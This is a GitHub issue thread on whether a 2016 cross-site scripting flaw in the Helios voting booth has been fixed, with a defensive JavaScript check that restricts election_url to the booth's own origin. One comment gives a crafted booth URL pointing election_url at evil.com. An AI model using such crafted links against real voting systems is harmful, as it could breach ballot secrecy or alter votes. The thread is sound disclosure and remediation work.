
2016 XSS issue on Wikipedia

Open richardolsson opened this issue 6 years ago • 5 comments

The Wikipedia article for Helios describes a 2016 XSS security issue and claims that "It is unclear if the vulnerability has been fixed as of 2019".

The issue is explained as such:

In 2016 researchers identified a cross-site scripting vulnerability. If the attacker is able to get a voter to click a specially crafted link, the voter will land on a modified HELIOS page which can violate ballot secrecy or manipulate votes.[5]

The citation is this 2016 article.

Has said issue been fixed, and if so, maybe it would be a good idea to update the Wikipedia page?

richardolsson avatar Nov 06 '19 08:11 richardolsson

I'm not sure about this, but... I looked over the research paper and I also checked the BOOTH. Using jQuery will also generate some vulnerabilities, but this can be fixed by using only pure JS.

Talking about XSS, Django settings have

django.middleware.clickjacking.XFrameOptionsMiddleware

adamalexandru4 avatar Mar 21 '20 19:03 adamalexandru4

I read the paper, the version that is deployed still seems to be vulnerable: https://vote.heliosvoting.org/booth/vote.html?election_url=http://evil.com/get-bad-data makes requests to evil.com.

redfast00 avatar Apr 20 '21 06:04 redfast00

@benadida ^ is this something you would accept a PR for? Is it okay to just block external URLs?

redfast00 avatar Apr 20 '21 06:04 redfast00

In particular, line 370 of heliosbooth/vote.html still uses $.getJSON, so that might still be vulnerable to XSS

redfast00 avatar Apr 20 '21 07:04 redfast00
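One way to do the blocking asked about above, as an added example and not code from Helios: the booth page checks the election_url query parameter against its own origin before handing it to any fetch (such as the $.getJSON call mentioned). isAllowedElectionUrl and electionUrlFromQuery are hypothetical names, and boothOrigin stands for what a browser page would read from window.location.origin.

```javascript
// Added example (not Helios code): validate a user-supplied election_url
// before the booth fetches anything from it, so a crafted link such as
// ?election_url=http://evil.com/get-bad-data cannot make the page load
// election data from an attacker-controlled origin.
//
// isAllowedElectionUrl() is a hypothetical name; boothOrigin stands in for
// window.location.origin, which the booth page would pass in.

function isAllowedElectionUrl(rawUrl, boothOrigin) {
  if (typeof rawUrl !== "string" || rawUrl.length === 0) {
    return false;
  }
  let parsed;
  try {
    // Relative URLs resolve against the booth's own origin; absolute and
    // protocol-relative ("//evil.com/...") URLs keep their own origin.
    parsed = new URL(rawUrl, boothOrigin);
  } catch (e) {
    return false; // unparsable input is rejected, never fetched
  }
  // Only http(s) is acceptable; this rules out javascript:, data:, blob: etc.
  if (parsed.protocol !== "https:" && parsed.protocol !== "http:") {
    return false;
  }
  // Same-origin check: scheme, host and port must all match the booth page.
  // Comparing origins rather than substrings means that
  // "https://vote.heliosvoting.org@evil.com/" is rejected, because the URL
  // parser assigns it the origin https://evil.com.
  return parsed.origin === boothOrigin;
}

// Booth-side wrapper: returns the absolute URL to fetch, or null if blocked.
function electionUrlFromQuery(queryString, boothOrigin) {
  const params = new URLSearchParams(queryString);
  const candidate = params.get("election_url");
  if (candidate === null || !isAllowedElectionUrl(candidate, boothOrigin)) {
    return null;
  }
  return new URL(candidate, boothOrigin).href;
}
```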

The XSS with getJSON seems to have been fixed (I can't reproduce it).

redfast00 avatar Apr 28 '21 11:04 redfast00